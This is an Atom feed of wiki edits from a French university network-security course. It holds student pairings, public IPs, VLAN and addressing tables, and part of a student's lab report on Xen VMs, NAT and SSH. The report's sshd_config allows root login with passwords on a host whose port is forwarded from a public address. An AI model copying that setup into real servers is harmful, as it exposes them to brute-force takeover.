<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="fr">
	<id>https://wiki-se.plil.fr/mediawiki/api.php?action=feedcontributions&amp;feedformat=atom&amp;user=Msalhi</id>
	<title>wiki-se.plil.fr - Contributions [fr]</title>
	<link rel="self" type="application/atom+xml" href="https://wiki-se.plil.fr/mediawiki/api.php?action=feedcontributions&amp;feedformat=atom&amp;user=Msalhi"/>
	<link rel="alternate" type="text/html" href="https://wiki-se.plil.fr/mediawiki/index.php/Sp%C3%A9cial:Contributions/Msalhi"/>
	<updated>2026-05-14T03:34:18Z</updated>
	<subtitle>Contributions</subtitle>
	<generator>MediaWiki 1.39.1</generator>
	<entry>
		<id>https://wiki-se.plil.fr/mediawiki/index.php?title=SE4_IdO_s%C3%A9curit%C3%A9_syst%C3%A8me/r%C3%A9seau_2025/2026&amp;diff=12746</id>
		<title>SE4 IdO sécurité système/réseau 2025/2026</title>
		<link rel="alternate" type="text/html" href="https://wiki-se.plil.fr/mediawiki/index.php?title=SE4_IdO_s%C3%A9curit%C3%A9_syst%C3%A8me/r%C3%A9seau_2025/2026&amp;diff=12746"/>
		<updated>2026-03-03T20:26:19Z</updated>

		<summary type="html">&lt;p&gt;Msalhi : /* Répartition des binômes pour les travaux pratiques &amp;quot;administration système et réseau&amp;quot; */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;= Répartition des binômes pour les travaux pratiques &amp;quot;administration système et réseau&amp;quot; =&lt;br /&gt;
&lt;br /&gt;
Préfixe des noms de machine : &amp;lt;code&amp;gt;SE4&amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
Domaines Internet à louer sur [[gandi.net]]. Identifiant &amp;lt;code&amp;gt;pifou&amp;lt;/code&amp;gt;. Regardez le montant prévu sur le compte avant de louer un domaine.&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Cahier !! Elève !! Nom de domaine&lt;br /&gt;
! Nom de machine de services !! Nom de machine mandataire&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E1 | Cahier n°1]] || Pierre CASIMIRI || merteuil.tech || SE4.Merteuil||SE4.Rosemonde&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E2 | Cahier n°2]] || Agathe HOUDUSSE || valmont.tech || SE4.Valmont||SE4.Rosemonde&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E3 | Cahier n°3]] || Lilia GHAZALI || kirchhoff.live|| SE4.Tension||SE4.Kirchhoff&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E4 | Cahier n°4]] || Marin GOURVEST || courant.online|| SE4.Courant||SE4.Kirchhoff&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E5 | Cahier n°5]] || Cédric PAYET || archlinuxbtw.lol|| SE4.CachyOS||SE4.LinusTorvalds&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E6 | Cahier n°6]] || Thomas DELOBELLE || archlinux.lol|| SE4.Manjaro||SE4.LinusTorvalds&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E7 | Cahier n°7]] || Ibrahim TEPELI || c2vts.fr|| SE4.C2||SE4.Garage&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E8 | Cahier n°8]] || Yassine YAHIANI || rs7.online|| SE4.RS7||SE4.Garage&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E9 | Cahier n°9]] || Aurèle VANGHELUWE || tompere.online|| SE4-Tompere1||SE4-Tompere0&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E10 | Cahier n°10]] || Tom MERIEN || tompere2.xyz|| SE4-Tompere2||SE4-Tompere0&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E11 | Cahier n°11]] || Varesse Evora Souop Metse || elvis21.tech|| SE4.Elf||SE4.RockStar&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E12 | Cahier n°12]] || Mario Sylainx S. GAUTHIER || kasav.online|| SE4.Kasav||SE4.RockStar&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E13 | Cahier n°13]] || Billel Cheklat || dardevil.tech|| SE4.catwoman||SE4.superman&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E14 | Cahier n°14]] || Antonin Biernacki || deadpool.tech|| SE4.batman||SE4.superman&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E15 | Cahier n°15]] || Mohamed Salhi || msalhi.online|| SE4.Moon||SE4.Solstice&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Nom machine mandataire !! IPv4 publique machine mandataire !! Elèves &lt;br /&gt;
!numéro de binôme&lt;br /&gt;
!Adresse IPV4 OpenWRT&lt;br /&gt;
|-&lt;br /&gt;
| SE4.Rosemonde|| 193.48.57.165|| Pierre CASIMIRI &amp;amp; Agathe HOUDUSSE&lt;br /&gt;
|1&lt;br /&gt;
|193.48.57.177&lt;br /&gt;
|-&lt;br /&gt;
| SE4.Kirchhoff|| 193.48.57.171|| Lilia GHAZALI &amp;amp; Marin GOURVEST&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|-&lt;br /&gt;
| SE4.LinusTorvalds|| 193.48.57.166|| Cédric PAYET &amp;amp; Thomas DELOBELLE&lt;br /&gt;
|3&lt;br /&gt;
|193.48.57.180&lt;br /&gt;
|-&lt;br /&gt;
| SE4.Garage|| 193.48.57.170|| Ibrahim TEPELI &amp;amp; Yassine YAHIANI &lt;br /&gt;
|4&lt;br /&gt;
|193.48.57.178&lt;br /&gt;
|-&lt;br /&gt;
| SE4-Tompere0|| 193.48.57.168|| Aurèle VANGHELUWE &amp;amp; Tom MERIEN&lt;br /&gt;
|5&lt;br /&gt;
|&lt;br /&gt;
|-&lt;br /&gt;
| SE4.superman|| 193.48.57.169|| Billel Cheklat &amp;amp; Antonin Biernacki&lt;br /&gt;
|7&lt;br /&gt;
|&lt;br /&gt;
|-&lt;br /&gt;
| SE4.RockStar|| 193.48.57.172|| Varesse Evora Souop Metse &amp;amp; GAUTHIER Mario Sylainx S.&lt;br /&gt;
|6&lt;br /&gt;
|193.48.57.179&lt;br /&gt;
|-&lt;br /&gt;
| SE4.Solstice|| 193.48.57.167|| Mohamed Salhi &lt;br /&gt;
|2&lt;br /&gt;
|193.48.57.173&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
= Tableau des commutateurs virtuels =&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Noms des élèves !! Nom du fichier de configuration !! Réseau IPv4 utilisé &lt;br /&gt;
|-&lt;br /&gt;
| CASIMIRI / HOUDUSSE || pont_gercourt || 192.168.3.0/24&lt;br /&gt;
|-&lt;br /&gt;
|PAYET / DELOBELLE&lt;br /&gt;
|pont_pacman&lt;br /&gt;
|192.168.10.0/24&lt;br /&gt;
|-&lt;br /&gt;
|MERIEN / VANGHELUWE&lt;br /&gt;
|pont_pere&lt;br /&gt;
|192.168.0.0/24&lt;br /&gt;
|-&lt;br /&gt;
|CHEKLAT / BIERNACKI&lt;br /&gt;
|pont_ironman&lt;br /&gt;
|192.168.69.0/24&lt;br /&gt;
|-&lt;br /&gt;
|SALHI&lt;br /&gt;
|pont_msalhi&lt;br /&gt;
|192.168.20.0/24&lt;br /&gt;
|-&lt;br /&gt;
|GOURVEST/GHAZALI&lt;br /&gt;
|pont_diviseur&lt;br /&gt;
|192.168.67.0/24&lt;br /&gt;
|-&lt;br /&gt;
|YAHIANI / TEPELI&lt;br /&gt;
|pontclio&lt;br /&gt;
|192.168.7.0/24&lt;br /&gt;
|-&lt;br /&gt;
|GAUTHIER / SOUOP METSE&lt;br /&gt;
|Styx&lt;br /&gt;
|192.168.50.0/24&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
= Tableau des réseaux virtuels =&lt;br /&gt;
&lt;br /&gt;
VLAN privés :&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Nom !! Numéro &lt;br /&gt;
|-&lt;br /&gt;
| VLAN1 || 1&lt;br /&gt;
|-&lt;br /&gt;
| MV-PROMO || 2 &lt;br /&gt;
|-&lt;br /&gt;
|E1-Pierre&lt;br /&gt;
|11&lt;br /&gt;
|-&lt;br /&gt;
|E2-Agathe&lt;br /&gt;
|12&lt;br /&gt;
|-&lt;br /&gt;
|E5-Cedric&lt;br /&gt;
|15&lt;br /&gt;
|-&lt;br /&gt;
|E6-Thomas&lt;br /&gt;
|16&lt;br /&gt;
|-&lt;br /&gt;
|E9-Aurele&lt;br /&gt;
|19&lt;br /&gt;
|-&lt;br /&gt;
|E10-Tom&lt;br /&gt;
|20&lt;br /&gt;
|-&lt;br /&gt;
|E13-Billel&lt;br /&gt;
|23&lt;br /&gt;
|-&lt;br /&gt;
|E14-Antonin&lt;br /&gt;
|24&lt;br /&gt;
|-&lt;br /&gt;
|E15-MSalhi&lt;br /&gt;
|25&lt;br /&gt;
|-&lt;br /&gt;
|E11-Evora&lt;br /&gt;
|28&lt;br /&gt;
|-&lt;br /&gt;
|E12-Gauthier&lt;br /&gt;
|21&lt;br /&gt;
|-&lt;br /&gt;
|E8-Yassine&lt;br /&gt;
|18&lt;br /&gt;
|-&lt;br /&gt;
|E7-Ibrahim&lt;br /&gt;
|17&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
VLAN communs avec l'école :&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Nom !! Numéro &lt;br /&gt;
|-&lt;br /&gt;
| INTERCO1 || 530 &lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
= Schéma de câblage =&lt;br /&gt;
&lt;br /&gt;
Vous avez des éléments réseaux et des panneaux de brassage fibres dans les locaux techniques SR31 et SR52 ainsi que dans les salles E304 et E306.&lt;br /&gt;
&lt;br /&gt;
Le plan doit donc comporter, pour chaque connexion, les locaux d'origine et de destination ainsi que l'identifiant des ports d'origine et de destination.&lt;br /&gt;
&lt;br /&gt;
= Plan d'adressage =&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Nom VLAN !! Réseau IPv4 !! Réseau IPv6 &lt;br /&gt;
|-&lt;br /&gt;
| MV-PROMO || &amp;lt;code&amp;gt;193.48.57.160/27&amp;lt;/code&amp;gt; || &amp;lt;/code&amp;gt;2001:660:4401:60a0::/64&amp;lt;/code&amp;gt;&lt;br /&gt;
|-&lt;br /&gt;
| PoolPierre || &amp;lt;code&amp;gt;10.60.1.0/24&amp;lt;/code&amp;gt; || &amp;lt;/code&amp;gt;2001:660:4401:60a1::/64&amp;lt;/code&amp;gt;&lt;br /&gt;
|-&lt;br /&gt;
| PoolAgathe || &amp;lt;code&amp;gt;10.60.2.0/24&amp;lt;/code&amp;gt; || &amp;lt;/code&amp;gt;2001:660:4401:60a2::/64&amp;lt;/code&amp;gt;&lt;br /&gt;
|-&lt;br /&gt;
|PoolCedric&lt;br /&gt;
|&amp;lt;code&amp;gt;10.60.5.0/24&amp;lt;/code&amp;gt;&lt;br /&gt;
|2001:660:4401:60a5::/64&lt;br /&gt;
|-&lt;br /&gt;
|PoolThomas&lt;br /&gt;
|&amp;lt;code&amp;gt;10.60.6.0/24&amp;lt;/code&amp;gt;&lt;br /&gt;
|2001:660:4401:60a6::/64&lt;br /&gt;
|-&lt;br /&gt;
|PoolBillel&lt;br /&gt;
|&amp;lt;code&amp;gt;10.60.13.0/24&amp;lt;/code&amp;gt;&lt;br /&gt;
|2001:660:4401:60ad::/64&lt;br /&gt;
|-&lt;br /&gt;
|PoolAurele&lt;br /&gt;
|&amp;lt;code&amp;gt;10.60.9.0/24&amp;lt;/code&amp;gt;&lt;br /&gt;
|2001:660:4401:60a9::/64&lt;br /&gt;
|-&lt;br /&gt;
|PoolTom&lt;br /&gt;
|&amp;lt;code&amp;gt;10.60.10.0/24&amp;lt;/code&amp;gt;&lt;br /&gt;
|2001:660:4401:60aa::/64&lt;br /&gt;
|-&lt;br /&gt;
|PoolSalhi&lt;br /&gt;
|&amp;lt;code&amp;gt;10.60.15.0/24&amp;lt;/code&amp;gt;&lt;br /&gt;
|2001:660:4401:60b1::/64&lt;br /&gt;
|-&lt;br /&gt;
|PoolAntonin&lt;br /&gt;
|&amp;lt;code&amp;gt;10.60.14.0/24&amp;lt;/code&amp;gt;&lt;br /&gt;
|2001:660:4401:60ae::/64&lt;br /&gt;
|-&lt;br /&gt;
|PoolYassine&lt;br /&gt;
|10.60.8.0/24&lt;br /&gt;
|2001:660:4401:60a8::/64&lt;br /&gt;
|-&lt;br /&gt;
|PoolEvora&lt;br /&gt;
|10.60.11.0/24&lt;br /&gt;
|2001:660:4401:60ab::/64&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Adresses IPv4 des éléments réseau dans VLAN1&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Elément !! Adresse &lt;br /&gt;
|-&lt;br /&gt;
| Routeur C9200-E304 || 172.27.0.1/16&lt;br /&gt;
|-&lt;br /&gt;
| Routeur C9200-E306 || 172.27.0.2/16&lt;br /&gt;
|-&lt;br /&gt;
| Borne Wi-Fi E306 || 172.27.0.3/16&lt;br /&gt;
|-&lt;br /&gt;
| Borne Wi-Fi E304 || 172.27.0.4/16&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
= Informations VRRP =&lt;br /&gt;
&lt;br /&gt;
Pour chaque VLAN et pour chaque instance VRRP dans le VLAN listez les adresses IPv4 propres ainsi que l'unique IPv4 virtuelle.&lt;br /&gt;
&lt;br /&gt;
== VLAN des machines virtuelles ==&lt;br /&gt;
&lt;br /&gt;
Une seule instance VRRP dans le VLAN des machines virtuelles.&lt;br /&gt;
&lt;br /&gt;
Adresse IPv4 virtuelle : &amp;lt;code&amp;gt;193.48.57.162&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Routeur !! IPv4 propre &lt;br /&gt;
|-&lt;br /&gt;
| C9200 E304 || &amp;lt;code&amp;gt;193.48.57.163&amp;lt;/code&amp;gt;&lt;br /&gt;
|- &lt;br /&gt;
| C9200 E306 || &amp;lt;code&amp;gt;193.48.57.164&amp;lt;/code&amp;gt;&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
== VLAN ... ==&lt;/div&gt;</summary>
		<author><name>Msalhi</name></author>
	</entry>
	<entry>
		<id>https://wiki-se.plil.fr/mediawiki/index.php?title=Atelier_SysRes_SE4_2025/2026_E15&amp;diff=12508</id>
		<title>Atelier SysRes SE4 2025/2026 E15</title>
		<link rel="alternate" type="text/html" href="https://wiki-se.plil.fr/mediawiki/index.php?title=Atelier_SysRes_SE4_2025/2026_E15&amp;diff=12508"/>
		<updated>2026-02-27T13:03:10Z</updated>

		<summary type="html">&lt;p&gt;Msalhi : /* Filtrage des services – fail2ban */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;br /&gt;
&amp;lt;div class=&amp;quot;titlepage&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div class=&amp;quot;figure&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[[File:polytech_logo.png|image]]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
'''Rapport de Projet SE4 IdO'''                                                                                             '''Année Universitaire 2025-2026'''&lt;br /&gt;
&lt;br /&gt;
'''Étudiant: Mohamed SALHI'''                                                           '''Binôme: SE4.Solstice (mandataire) - SE4.Moon (services)'''&lt;br /&gt;
&lt;br /&gt;
'''Domaine: &amp;lt;code&amp;gt;msalhi.online&amp;lt;/code&amp;gt;'''&lt;br /&gt;
&amp;lt;/div&amp;gt;&amp;lt;span id=&amp;quot;introduction&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
= Introduction =&lt;br /&gt;
&lt;br /&gt;
Ce rapport documente la réalisation complète du projet de sécurité système et réseau dans le cadre du module SE4 IdO (Internet des Objets). L’objectif principal était de mettre en place une infrastructure réseau complète avec services virtualisés, en mettant l’accent sur la sécurité et la redondance.&lt;br /&gt;
&lt;br /&gt;
L’architecture repose sur une approche '''dual-stack IPv4/IPv6''' avec :&lt;br /&gt;
&lt;br /&gt;
* Une '''machine de services''' (SE4.Moon) hébergeant les services applicatifs&lt;br /&gt;
* Une '''machine mandataire''' (SE4.Solstice) gérant les accès IPv4 via NAT et proxy inverse&lt;br /&gt;
* Une infrastructure réseau redondante avec routeurs Cisco C9200&lt;br /&gt;
* Des services sécurisés (DNS avec DNSSEC, HTTPS avec certificats, SSH avec filtrage)&lt;br /&gt;
&lt;br /&gt;
&amp;lt;span id=&amp;quot;atelier-système-et-réseau---machines-virtuelles&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
= Atelier système et réseau - Machines virtuelles =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;span id=&amp;quot;création-des-machines-virtuelles&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
== Création des machines virtuelles ==&lt;br /&gt;
&lt;br /&gt;
Les machines virtuelles ont été créées sur l’hyperviseur Xen du Dom0 &amp;lt;code&amp;gt;capbreton.plil.info&amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;span id=&amp;quot;commandes-de-création&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
=== Commandes de création ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;# Création de la machine de services SE4.Moon&lt;br /&gt;
root@capbreton:~# xen-create-image --hostname=SE4.Moon --dhcp \&lt;br /&gt;
  --bridge=pontKS --dir=/usr/local/xen --size=10GB \&lt;br /&gt;
  --dist=daedalus --memory=2048M --force&lt;br /&gt;
&lt;br /&gt;
# Création de la machine mandataire SE4.Solstice&lt;br /&gt;
root@capbreton:~# xen-create-image --hostname=SE4.Solstice --dhcp \&lt;br /&gt;
  --bridge=pontKS --dir=/usr/local/xen --size=10GB \&lt;br /&gt;
  --dist=daedalus --memory=2048M --force&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&amp;lt;span id=&amp;quot;démarrage-et-connexion&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
=== Démarrage et connexion ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;# Démarrage des VMs&lt;br /&gt;
xen create /etc/xen/SE4.Moon.cfg&lt;br /&gt;
xen create /etc/xen/SE4.Solstice.cfg&lt;br /&gt;
&lt;br /&gt;
# Connexion aux consoles&lt;br /&gt;
xen console SE4.Moon&lt;br /&gt;
xen console SE4.Solstice&lt;br /&gt;
&lt;br /&gt;
# Liste des VMs actives&lt;br /&gt;
root@capbreton:~# xen list&lt;br /&gt;
Name                                        ID   Mem VCPUs    State   Time(s)&lt;br /&gt;
SE4.Solstice                                39  2048     1     -b----    2560.1&lt;br /&gt;
SE4.Moon                                   119  2048     1     -b----     452.3&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&amp;lt;span id=&amp;quot;configuration-de-la-machine-de-services-se4.moon&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
== Configuration de la machine de services (SE4.Moon) ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;span id=&amp;quot;montage-des-partitions-lvm-pour-var-et-home&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
=== Montage des partitions LVM pour /var et /home ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;# Création des fichiers de partition sur le Dom0&lt;br /&gt;
root@capbreton:/dev/virtual# lvcreate -L 10G -n SE4.Moon.var virtual&lt;br /&gt;
root@capbreton:/dev/virtual# lvcreate -L 10G -n SE4.Moon.home virtual&lt;br /&gt;
&lt;br /&gt;
# Modification du fichier de configuration Xen&lt;br /&gt;
disk = [&lt;br /&gt;
    'file:/usr/local/xen/domains/SE4.Moon/disk.img,xvda2,w',&lt;br /&gt;
    'file:/usr/local/xen/domains/SE4.Moon/swap.img,xvda1,w',&lt;br /&gt;
    'phy:/dev/virtual/SE4.Moon.home,xvdb,w',&lt;br /&gt;
    'phy:/dev/virtual/SE4.Moon.var,xvdc,w',&lt;br /&gt;
]&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&amp;lt;span id=&amp;quot;formatage-et-montage-des-partitions&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
=== Formatage et montage des partitions ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;# Formatage des partitions&lt;br /&gt;
mkfs -t ext4 /dev/xvdb&lt;br /&gt;
mkfs -t ext4 /dev/xvdc&lt;br /&gt;
&lt;br /&gt;
# Montage temporaire et copie des données&lt;br /&gt;
mount /dev/xvdc /mnt&lt;br /&gt;
mv /var/* /mnt/&lt;br /&gt;
umount /mnt&lt;br /&gt;
&lt;br /&gt;
mount /dev/xvdb /mnt&lt;br /&gt;
mv /home/* /mnt/&lt;br /&gt;
umount /mnt&lt;br /&gt;
&lt;br /&gt;
# Configuration du fstab&lt;br /&gt;
cat &amp;gt; /etc/fstab &amp;lt;&amp;lt; EOF&lt;br /&gt;
/dev/xvda1 none swap sw 0 0&lt;br /&gt;
/dev/xvda2 / ext4 noatime,nodiratime,errors=remount-ro 0 1&lt;br /&gt;
/dev/xvdb /home ext4 defaults 0 2&lt;br /&gt;
/dev/xvdc /var ext4 defaults 0 2&lt;br /&gt;
EOF&lt;br /&gt;
&lt;br /&gt;
# Application des modifications&lt;br /&gt;
mount -a&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&amp;lt;span id=&amp;quot;configuration-réseau&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
=== Configuration réseau ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;# Fichier /etc/network/interfaces&lt;br /&gt;
auto lo&lt;br /&gt;
iface lo inet loopback&lt;br /&gt;
&lt;br /&gt;
# Interface réseau privée (vers Solstice)&lt;br /&gt;
auto eth0&lt;br /&gt;
iface eth0 inet static&lt;br /&gt;
    address 192.168.20.2/24&lt;br /&gt;
    gateway 192.168.20.1&lt;br /&gt;
&lt;br /&gt;
# Configuration IPv6 automatique&lt;br /&gt;
iface eth0 inet6 auto&lt;br /&gt;
&lt;br /&gt;
# Vérification&lt;br /&gt;
root@Moon:~# ip a show eth0&lt;br /&gt;
2: eth0: &amp;lt;BROADCAST,MULTICAST,UP,LOWER_UP&amp;gt; mtu 1500 qdisc pfifo_fast state UP&lt;br /&gt;
    inet 192.168.20.2/24 brd 192.168.20.255 scope global eth0&lt;br /&gt;
    inet6 2001:660:4401:60a0:216:3eff:fe6f:f547/64 scope global dynamic&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&amp;lt;span id=&amp;quot;installation-des-paquets-de-base&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
=== Installation des paquets de base ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;apt update &amp;amp;&amp;amp; apt upgrade -y&lt;br /&gt;
apt install -y ssh apache2 bind9 bind9utils \&lt;br /&gt;
  fail2ban openssl iptables-persistent \&lt;br /&gt;
  net-tools curl wget vim&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&amp;lt;span id=&amp;quot;configuration-de-la-machine-mandataire-se4.solstice&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
== Configuration de la machine mandataire (SE4.Solstice) ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;span id=&amp;quot;configuration-réseau-1&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
=== Configuration réseau ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;# Fichier /etc/network/interfaces&lt;br /&gt;
auto lo&lt;br /&gt;
iface lo inet loopback&lt;br /&gt;
&lt;br /&gt;
# Interface publique (réseau routé)&lt;br /&gt;
auto eth1&lt;br /&gt;
iface eth1 inet static&lt;br /&gt;
    address 193.48.57.167/27&lt;br /&gt;
    gateway 193.48.57.162  # Adresse VRRP virtuelle&lt;br /&gt;
&lt;br /&gt;
iface eth1 inet6 auto&lt;br /&gt;
&lt;br /&gt;
# Interface privée (vers Moon)&lt;br /&gt;
auto eth0&lt;br /&gt;
iface eth0 inet static&lt;br /&gt;
    address 192.168.20.1/24&lt;br /&gt;
&lt;br /&gt;
iface eth0 inet6 auto&lt;br /&gt;
&lt;br /&gt;
# Vérification&lt;br /&gt;
root@Solstice:~# ip a show eth1&lt;br /&gt;
3: eth1: &amp;lt;BROADCAST,MULTICAST,UP,LOWER_UP&amp;gt; mtu 1500 qdisc pfifo_fast state UP&lt;br /&gt;
    inet 193.48.57.167/27 brd 193.48.57.191 scope global eth1&lt;br /&gt;
    inet6 2001:660:4401:60a0:216:3eff:fe29:880f/64 scope global dynamic&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&amp;lt;span id=&amp;quot;mise-en-place-de-la-mascarade-nat&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
=== Mise en place de la mascarade (NAT) ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;# Activation du forwarding IP&lt;br /&gt;
echo &amp;quot;net.ipv4.ip_forward=1&amp;quot; &amp;gt;&amp;gt; /etc/sysctl.conf&lt;br /&gt;
sysctl -p&lt;br /&gt;
&lt;br /&gt;
# Règles iptables pour la mascarade&lt;br /&gt;
iptables -t nat -A POSTROUTING -s 192.168.20.0/24 -o eth1 -j MASQUERADE&lt;br /&gt;
iptables -A FORWARD -i eth0 -o eth1 -j ACCEPT&lt;br /&gt;
iptables -A FORWARD -i eth1 -o eth0 -m state --state RELATED,ESTABLISHED -j ACCEPT&lt;br /&gt;
&lt;br /&gt;
# Sauvegarde pour persistance&lt;br /&gt;
iptables-save &amp;gt; /etc/iptables/rules.v4&lt;br /&gt;
&lt;br /&gt;
# Ajout dans interfaces pour chargement au démarrage&lt;br /&gt;
post-up iptables-restore &amp;lt; /etc/iptables/rules.v4&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&amp;lt;span id=&amp;quot;services-internet&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
= Services Internet =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;span id=&amp;quot;serveur-ssh&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
== Serveur SSH ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;span id=&amp;quot;configuration-ssh-sur-moon&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
=== Configuration SSH sur Moon ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;# Édition du fichier de configuration&lt;br /&gt;
vim /etc/ssh/sshd_config&lt;br /&gt;
&lt;br /&gt;
# Modifications apportées :&lt;br /&gt;
PermitRootLogin yes&lt;br /&gt;
PasswordAuthentication yes&lt;br /&gt;
Port 22&lt;br /&gt;
# LogLevel VERBOSE&lt;br /&gt;
&lt;br /&gt;
# Redémarrage du service&lt;br /&gt;
systemctl restart ssh&lt;br /&gt;
systemctl enable ssh&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&amp;lt;span id=&amp;quot;redirection-de-ports-pour-laccès-ipv4&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
=== Redirection de ports pour l’accès IPv4 ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;# Redirection du port 2201 vers Moon (SSH)&lt;br /&gt;
iptables -t nat -A PREROUTING -i eth1 -p tcp --dport 2201 \&lt;br /&gt;
  -j DNAT --to-destination 192.168.20.2:22&lt;br /&gt;
&lt;br /&gt;
iptables -A FORWARD -p tcp -d 192.168.20.2 --dport 22 -j ACCEPT&lt;br /&gt;
&lt;br /&gt;
# Sauvegarde&lt;br /&gt;
iptables-save &amp;gt; /etc/iptables/rules.v4&lt;br /&gt;
&lt;br /&gt;
# Test de la redirection&lt;br /&gt;
ssh -p 2201 root@193.48.57.167  # Arrive sur Moon&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
